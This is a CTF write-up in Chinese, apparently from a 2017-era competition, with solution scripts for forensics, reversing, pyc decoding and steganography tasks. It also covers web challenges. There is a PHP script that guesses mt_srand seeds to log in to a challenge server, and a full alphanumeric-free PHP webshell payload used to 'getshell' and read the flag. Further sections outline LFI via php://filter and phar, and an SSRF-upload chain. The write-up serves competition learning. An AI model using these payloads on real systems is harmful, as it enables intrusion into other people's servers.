部分题解

流量分析

导出http 发现有个flag.zip
解压后文件内容是rgb的像素点
脚本:

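#-*- coding:utf-8 -*-
"""Rebuild the image hidden in ce.txt, which holds one "r,g,b" line per pixel.

The dump carries no header, so every (width, height) pair whose product equals
the line count is rendered and shown; the viewer picks the one that is not
garbage.  Runs on Python 2 and 3.
"""
from __future__ import print_function

from PIL import Image

LINE_COUNT = 98457  # number of "r,g,b" lines in ce.txt (must equal width * height)


def divisor_pairs(n):
    """Return every (w, h) with w * h == n and w < n, ordered by increasing w."""
    return [(k, n // k) for k in range(1, n) if n % k == 0]


def render(width, height, path='ce.txt'):
    """Build a width x height RGB image from the first width*height lines of *path*.

    Pixels are filled column by column ((0,0), (0,1), ...) exactly as the
    original script did.  A line with fewer than three comma-separated
    integers raises IndexError/ValueError rather than producing a bogus pixel.
    """
    im = Image.new("RGB", (width, height))
    # 'with' closes the dump on every exit; the original leaked one handle per
    # candidate size.
    with open(path) as fh:
        for i in range(width):
            for j in range(height):
                rgb = fh.readline().split(",")
                im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))
    return im


if __name__ == '__main__':
    for x, y in divisor_pairs(LINE_COUNT):
        print(x, y)
        render(x, y).show()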

Re4newer

ida打开
定位到判断函数
mark

flag 是v4和0x22的异或

mark

然后web狗手撕的 :)

Misc200

当时没做出来,因为没有去调试。。
拖到jeb里看一下有一个加密,一个解密文件,解密文件没东西,看了下加密,就是普通的和密码进行异或。所以就是要找到password,并没有找到。
我们进行调试,在加密一下就可以得到原文了,而且发现此时密码已经记住,然后把加密文件扔进去,就可以得到flag图片了

pyc分析

2015xdctf原题
uncompyle6 revPyc.pyc

反编译出源码

查看globals()

Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 1, in <lambda>
IOError: [Errno 2] No such file or directory: 'flag.txt'
>>> globals()
{'string': <module 'string' from 'D:\Python27\lib\string.pyc'>, '__builtins__': <module '__builtin__' (built-in)>, '__package__': None, 'i': 654, 'table': '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', 'encode': <function encode at 0x02836C30>, '__name__': '__main__', 'getbit': <function getbit at 0x028364B0>, '__doc__': None, 'setbit': <function setbit at 0x02815E30>}

整理完代码

[data['i'] = ((table.index(data['i']) + 1))
__this() for __l['buf'] in [(
j=(i / 6) * 8 + (i % 6)
setbit(buf, i, getbit(data, j))
if __i is not __sentinel else __after())(next(__items, __sentinel)))())
(iter(xrange((__l['_len'] * 6)))
for __g['table'] in [(string.printable.strip())]][0] for __g['string'] in [(__import__('string', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))

加密方式就出来了:把原字符在 table 中的 index+1 后,只把后 6 位(低 6 位)保存到文件里。由于 6×4 == 3×8(四个 6 位值正好凑成 3 字节),我就每 3 字节一起 decode,即 decode3b 函数。

exp

#Embedded file name: rev300.py
# Module namespace handle and a fixed-point (Y) combinator: both exist only
# because the decompiled code below expresses its loops as recursion over
# globals.  Kept so the unmodified obfuscated parts still run.
__g = globals()
__y = (lambda f: (lambda x: x(x))(lambda y: f(lambda : y(y)())))
# The decompiler rendered `import string` as __import__('string', __g, __g).
import string
# Encoder alphabet: printable ASCII with the trailing whitespace run removed
# (94 symbols: digits, a-z, A-Z, punctuation).
table = string.printable.strip()
"""
setbit = (lambda p, pos, value: (lambda __l: [ [ [ (lambda __target, __slice, __value: [ (lambda __target, __slice, __value: [ __l['p'] for __target[__slice] in [(lambda __old: (lambda __ret: (__old | __value if __ret is NotImplemented else __ret))(getattr(__old, '__ior__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], __l['value'] << __l['bpos']) for __target[__slice] in [(lambda __old: (lambda __ret: (__old & __value if __ret is NotImplemented else __ret))(getattr(__old, '__iand__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], ~(1 << __l['bpos'])) for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'], __l['value'] in [(p, pos, value)] ][0])({}))
setbit.__name__ = 'setbit'
getbit = (lambda p, pos: (lambda __l: [ [ [ __l['p'][__l['cpos']] >> __l['bpos'] & 1 for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'] in [(p, pos)] ][0])({}))
getbit.__name__ = 'getbit'
encode = (lambda data, buf: (lambda __l: [ [ (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ __this() for __l['data'][__l['i']] in [table.index(__l['data'][__l['i']]) + 1] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'])), lambda : (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ [ __this() for __l['buf'] in [setbit(__l['buf'], __l['i'], getbit(__l['data'], __l['j']))] ][0] for __l['j'] in [__l['i'] / 6 * 8 + __l['i'] % 6] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'] * 6)), lambda : __l['buf'], []), []) for __l['_len'] in [len(__l['data'])] ][0] for __l['data'], __l['buf'] in [(data, buf)] ][0])({}))
encode.__name__ = 'encode'
"""
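def setbit(p, pos, value):
    """Set bit *pos* of the int list *p* to *value* (0 or 1), in place.

    Bits are numbered LSB-first within each element (bit 0 is the lowest bit
    of p[0], bit 8 the lowest bit of p[1], ...).  *p* is mutated and also
    returned so callers may chain on it.  Passing a *value* other than 0/1
    would OR extra bits into the element, as in the original.
    """
    bpos = pos % 8
    cpos = pos // 8  # '//' keeps the index an int on Python 3 as well
    p[cpos] &= ~(1 << bpos)      # clear the target bit
    p[cpos] |= value << bpos     # then write the requested value
    return p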
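def getbit(p, pos):
    """Return bit *pos* of the int list *p* as 0 or 1.

    Same LSB-first numbering as setbit(): element pos // 8, bit pos % 8.
    """
    bpos = pos % 8
    cpos = pos // 8  # integer index on both Python 2 and 3
    return (p[cpos] >> bpos) & 1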
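def encode(data, buf):
    """Pack the low 6 bits of (table.index(ch) + 1) for every ch in *data* into *buf*.

    Output bit i (LSB-first) is taken from bit (i // 6) * 8 + i % 6 of the
    byte sequence of 1-based alphabet indexes, i.e. bits 6 and 7 of every
    index are dropped.  Consequently symbols with index >= 64 come back from
    decrypt() as the symbol at index - 64.  *buf* must hold at least
    ceil(6 * len(data) / 8) ints; it is mutated in place and returned.
    Raises ValueError if a character is not in *table*.
    """
    indexdata = [table.index(ch) + 1 for ch in data]
    for i in range(len(data) * 6):
        j = (i // 6) * 8 + i % 6
        setbit(buf, i, getbit(indexdata, j))
    return buf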
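def encrypt():
    """Readable equivalent of the decompiled encryptor.

    Reads key.txt, strips it, encodes the characters with encode() into a
    zero buffer of the same length (so roughly the last quarter of the
    output stays 0x00, exactly as the original wrote it) and writes the raw
    bytes to key1.enc.
    """
    with open('key.txt', 'r') as fin:
        s = fin.read().strip()
    ss = list(s)          # the original appended each char one by one
    sss = [0] * len(ss)   # one zero per input char; encode() fills 3/4 of it
    ssss = encode(ss, sss)
    # bytearray(list_of_ints) equals ''.join(chr(c) for c in ...) on Python 2
    # and is also what a binary file accepts on Python 3.
    with open('key1.enc', 'wb+') as fout:
        fout.write(bytearray(ssss))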
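def decrypt(path='key.enc'):
    """Undo encode(): read *path*, unpack the 6-bit groups and shift each back by one.

    Every 3 cipher bytes hold four 6-bit values (6*4 == 3*8); decode3b maps
    them to table symbols and the final join subtracts the +1 that encode()
    added, modulo 64 because only six bits survived.  A trailing chunk
    shorter than 3 bytes is decoded as if zero-padded on the left, as the
    original did.  The intermediate string is printed for debugging.
    """
    with open(path, 'rb') as fin:
        cipher = fin.read()

    def decode3b(s):
        # s is a 24-bit int; split it into bytes and re-slice the MSB-first
        # bit strings so the LSB-first 6-bit groups come out in symbol order.
        a = s >> 16
        b = (s >> 8) & 0xFF
        c = s & 0xFF
        sa = bin(a)[2:].zfill(8)
        sb = bin(b)[2:].zfill(8)
        sc = bin(c)[2:].zfill(8)
        return (table[int(sa[2:], 2)]
                + table[int(sb[4:] + sa[:2], 2)]
                + table[int(sc[6:] + sb[:4], 2)]
                + table[int(sc[:6], 2)])

    groups = []
    for i in range(0, len(cipher), 3):
        # Big-endian fold; bytearray() yields ints for both str (Py2) and
        # bytes (Py3), unlike the Py2-only .encode('hex').
        s = 0
        for byte in bytearray(cipher[i:i + 3]):
            s = (s << 8) | byte
        groups.append(decode3b(s))
    plain = ''.join(groups)
    print(plain)
    return ''.join(table[(table.index(c) + 63) % 64] for c in plain)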
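if __name__ == '__main__':
    print(decrypt())
    # Only six bits per symbol survive, so index 13 ('d') and index 13 + 64
    # (':' in this table) encode identically; print the alias to resolve the
    # ambiguous last character of the recovered key.
    print(table[table.index("d") + 64])
#Key:9733c070b2138e5f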

由于只保留了 (index+1) 的最后 6 位,所以 table 里 index 大于 64 的特殊字符在解出的结果中是不会出现的(它们会落到 index-64 的字符上),key 末尾的 d 其实是 ':'

web200

根据http://118.190.87.135:10080/?op=home
尝试文件包含 ../ 关键字被禁
使用php filter 读取文件
common.php 发现自动添加.png后缀

mark

可以使用phar协议绕过

mark

但是php 命令执行相关函数被禁 可以使用php函数读取

mark

mark

简单的安卓

jeb载入 即可

mark

热身运动

gif 一帧帧的看

发现坐标可以和base64 一一对应 最后=补全即可

ZmxhZ3sxdF8xNV9mdW5ueX0=

flag{1t_15_funny}

random

.index.php.swp
发现源码泄露

mark

简单的mt_srand随机数爆破 session置空的绕过

脚本如下

<?php
// Seed-recovery script from the write-up.  The target presumably derives its
// password from mt_rand() after mt_srand(time()) (inferred from the
// time()-20 .. +40 window below), so a handful of candidate seeds is enough
// to reproduce it.
// Defensive takeaway: mt_rand()/rand() are not cryptographic and a
// time-based seed is guessable; derive secrets from random_bytes()/random_int()
// and rate-limit the login endpoint so a 40-request window is not free.
function create_password($pw_length = 10){ $randpwd = ""; for ($i = 0; $i < $pw_length; $i++){ $randpwd .= chr(mt_rand(100, 200)); } return $randpwd; } $t = time()-20; for($i = $t; $i < $t + 40; $i++){ mt_srand($i); $pwd=create_password(); $curl = file_get_contents("http://114.215.138.89:10080/index.php?pwd=$pwd&login="); echo $curl.'<br>'; }

web300

mark

阅读源码 构造不含上述字符的shell即可

根据p牛博客
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

‘a’++ => ‘b’,’b’++ => ‘c’… 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。
那么,如何拿到一个值为字符串’a’的变量呢?
巧了,数组(Array)的第一个字母就是大写A,而且第4个字母是小写a。也就是说,我们可以同时拿到小写和大写A,等于我们就可以拿到a-z和A-Z的所有字母。
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为Array:
再取这个字符串的第一个字母,就可以获得’A’了
payload:
http://127.0.0.1:8000/web300.php?content=$_=[].'';$_=$_[']'=='['];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

url 编码一下 提交
getshell
cat flag.php

mark

Misc300

脚本:

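import pickle
from PIL import Image

# NOTE(security): unpickling runs arbitrary code embedded in the file, so a
# downloaded challenge artefact should only be loaded in a throwaway VM or
# sandbox; a plain-data format (JSON/CSV) would be the safe alternative.
# A pickle is binary, so it must be opened in 'rb' and fed to pickle.load():
# the original read it in text mode and re-encoded, which only works by
# accident on ASCII (protocol-0) pickles and breaks on Python 3.
with open('pixels.jpg.pkl', 'rb') as f:
    data = pickle.load(f)

# data[0] is skipped as in the original (presumably a header entry — confirm
# against the pickle); every remaining entry is an (x, y) coordinate pair.
white_pixels = [(int(e[0]), int(e[1])) for e in data[1:]]
# Pad the canvas by 10 px so the outermost white pixels are not on the edge.
width = max(p[0] for p in white_pixels) + 10
height = max(p[1] for p in white_pixels) + 10
image = Image.new('1', (width, height), 0)  # 1-bit image, black background
pixels = image.load()
for x, y in white_pixels:
    pixels[x, y] = 255  # any non-zero value is white in mode '1'
image.show()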

mark

漫画图作者为billwatterson,就是flag

web400

这个题好像没人做出来。。。
赛后听人说是先用ssrf 302读文件,上传文件页面需要session[‘token’]=1,然后开启debug请求user.php获取session,利用session上传文件,common.php可以自动包含文件,include参数加入赋值等于upload,会自动包含ini文件。
没有环境也没有复现。